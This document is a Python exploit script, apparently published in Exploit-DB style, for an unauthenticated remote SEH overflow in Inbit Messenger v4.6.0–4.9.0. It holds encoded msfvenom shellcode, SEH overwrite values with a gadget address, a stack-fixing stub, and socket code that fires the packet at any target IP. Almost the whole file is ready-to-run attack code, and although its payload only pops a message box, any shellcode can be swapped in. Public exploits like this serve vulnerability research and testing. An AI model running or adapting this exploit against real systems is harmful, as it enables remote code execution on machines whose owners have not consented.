# Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow
# Date: 11/08/2022
# Exploit Author: a-rey 
# Vendor Homepage: http://www.inbit.com/support.html
# Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html
# Version: v4.6.0 - v4.9.0
# Tested on: Windows XP SP3, Windows 7, Windows 10
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import sys, socket, struct, argparse, logging

"""
/opt/metasploit-framework/bin/msfvenom \
  -p windows/messagebox \
  ICON=WARNING          \
  TEXT="get wrecked"    \
  TITLE="LOLZ"          \
  EXITFUNC=thread       \
  -f py                 \
  -v SHELLCODE          \
  -e x86/shikata_ga_nai \
  -b '\x3E'           
"""
SHELLCODE =  b""
SHELLCODE += b"\xba\xbd\x3d\x03\xfa\xd9\xc9\xd9\x74\x24\xf4"
SHELLCODE += b"\x5b\x31\xc9\xb1\x41\x31\x53\x14\x03\x53\x14"
SHELLCODE += b"\x83\xc3\x04\x5f\xc8\xda\x11\x04\xea\xa9\xc1"
SHELLCODE += b"\xce\x3c\x80\xb8\x59\x0e\xed\xd9\x2e\x01\xdd"
SHELLCODE += b"\xaa\x46\xee\x96\xdb\xba\x65\xee\x2b\x49\x07"
SHELLCODE += b"\xcf\xa0\x7b\xc0\x40\xaf\xf6\xc3\x06\xce\x29"
SHELLCODE += b"\xdc\x58\xb0\x42\x4f\xbf\x15\xdf\xd5\x83\xde"
SHELLCODE += b"\x8b\xfd\x83\xe1\xd9\x75\x39\xfa\x96\xd0\x9e"
SHELLCODE += b"\xfb\x43\x07\xea\xb2\x18\xfc\x98\x44\xf0\xcc"
SHELLCODE += b"\x61\x77\xcc\xd3\x32\xfc\x0c\x5f\x4c\x3c\x43"
SHELLCODE += b"\xad\x53\x79\xb0\x5a\x68\xf9\x62\x8b\xfa\xe0"
SHELLCODE += b"\xe1\x91\x20\xe2\x1e\x43\xa2\xe8\xab\x07\xee"
SHELLCODE += b"\xec\x2a\xf3\x84\x09\xa7\x02\x73\x98\xf3\x20"
SHELLCODE += b"\x9f\xfa\x38\x9a\x97\xd5\x6a\x52\x42\xac\x50"
SHELLCODE += b"\x0d\x03\xe1\x5a\x22\x49\x16\xfd\x45\x91\x19"
SHELLCODE += b"\x88\xff\x6a\x5d\x65\x31\x92\xc1\xfe\xd2\x77"
SHELLCODE += b"\x50\xe8\x65\x88\xab\x17\xf0\x32\x5c\x8f\x6f"
SHELLCODE += b"\xd1\x7c\x0e\x18\x1a\x4f\xbe\xbc\x34\xda\xcd"
SHELLCODE += b"\x59\xb7\x14\xea\x2a\x6b\x71\x06\xa2\x72\x2f"
SHELLCODE += b"\xe9\xe1\x7e\x59\xd7\x5a\xc4\xf1\x75\x17\x86"
SHELLCODE += b"\x85\x65\x8c\xa4\x61\xca\x33\xb7\x8d\x9c\x93"
SHELLCODE += b"\x68\x52\x7c\x4c\x25\xdd\x30\xd6\x84\x3a\x40"
SHELLCODE += b"\xba\xc2\xb8\xd9\xa0\x63\xaa\xbc\x42\x2c\x44"
SHELLCODE += b"\x49\xf9\xa9\xf7\xdd\x9a\x54\x8c\x3d\x54\x5e"
SHELLCODE += b"\xe4\x71\xb2\x6b\x7c\x68\x8b\xb9\x14\x5a\xbf"
SHELLCODE += b"\x6c\xbb\x65\xef\xbe\xfb\xc9\xef\x94\xf3"

BANNER = """\033[0m\033[1;35m
╔═════════════════════════════════════════════════════════════════════╗
║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote SEH Overflow \033[1;35m║
╚═════════════════════════════════════════════════════════════════════╝\033[0m
 by: \033[1;36m █████╗      ██████╗ ███████╗██╗   ██╗
     \033[1;36m██╔══██╗     ██╔══██╗██╔════╝██║   ██║
     \033[1;36m███████║ ███ ██████╔╝█████╗   ██╗ ██═╝
     \033[1;36m██╔══██║     ██╔══██╗██╔══╝     ██╔╝  
     \033[1;36m██║  ██║     ██║  ██║███████╗   ██║   
     \033[1;36m╚═╝  ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝   
\033[0m"""

BAD_BYTES = b"\x3e" # >
PAYLOAD_LENGTH = 2000

nSEH = b"\xEB\x06\x90\x90"           # JMP SHORT 0x8; NOP; NOP
SEH  = struct.pack("<I", 0x263ae1bd) # ipworks6.dll | POP EBP; POP EBX; RET

# NOTE: sets the TEB's ACTIVATION_CONTEXT_STACK.ActiveFrame = NULL
NULL_ACT_CTX_STUB  = b"\x31\xC0\xBB\x00\x10"
NULL_ACT_CTX_STUB += b"\x00\x00\x64\x8B\x48"
NULL_ACT_CTX_STUB += b"\x18\x39\x99\xA8\x01"
NULL_ACT_CTX_STUB += b"\x00\x00\x7C\x0A\x8B"
NULL_ACT_CTX_STUB += b"\x99\xA8\x01\x00\x00"
NULL_ACT_CTX_STUB += b"\x89\x03\xEB\x06\x89"
NULL_ACT_CTX_STUB += b"\x81\xB0\x01\x00\x00" 

def exploit(targetIp:str, targetPort:int) -> None:
  pkt  = b"<"
  pkt += (b"A" * 40)
  pkt += nSEH
  pkt += SEH
  pkt += NULL_ACT_CTX_STUB
  pkt += (b"\x90" * 32) # NOP sled for shikata_ga_nai decoder
  pkt += SHELLCODE
  # NOTE: need to send 1600+ bytes to overwrite beyond top of thread's stack
  pkt += (b"B" * (PAYLOAD_LENGTH - len(pkt)))
  # NOTE: check for bad bytes
  for c in pkt:
    if c in BAD_BYTES:
      logging.error(f"found bad byte 0x{c:02x} in payload")
      sys.exit(-1)
  logging.info(f"sending {len(pkt)} byte payload to {targetIp}:{targetPort} ...")
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((targetIp, targetPort))
  s.send(pkt)
  s.close()
  logging.success("DONE")

if __name__ == '__main__':
  # parse arguments
  parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
  parser.add_argument('-t', '--target', help='target IP',   type=str, required=True)
  parser.add_argument('-p', '--port',   help='target port', type=int, required=False, default=10883)
  args = parser.parse_args()
  # define logger
  logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO')
  logging.SUCCESS = logging.CRITICAL + 1
  logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
  logging.addLevelName(logging.ERROR,   '\033[0m\033[1;31mFAIL\033[0m')
  logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
  logging.addLevelName(logging.INFO,    '\033[0m\033[1;36mINFO\033[0m')
  logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
  # print banner
  print(BANNER)
  # run exploit
  exploit(args.target, args.port)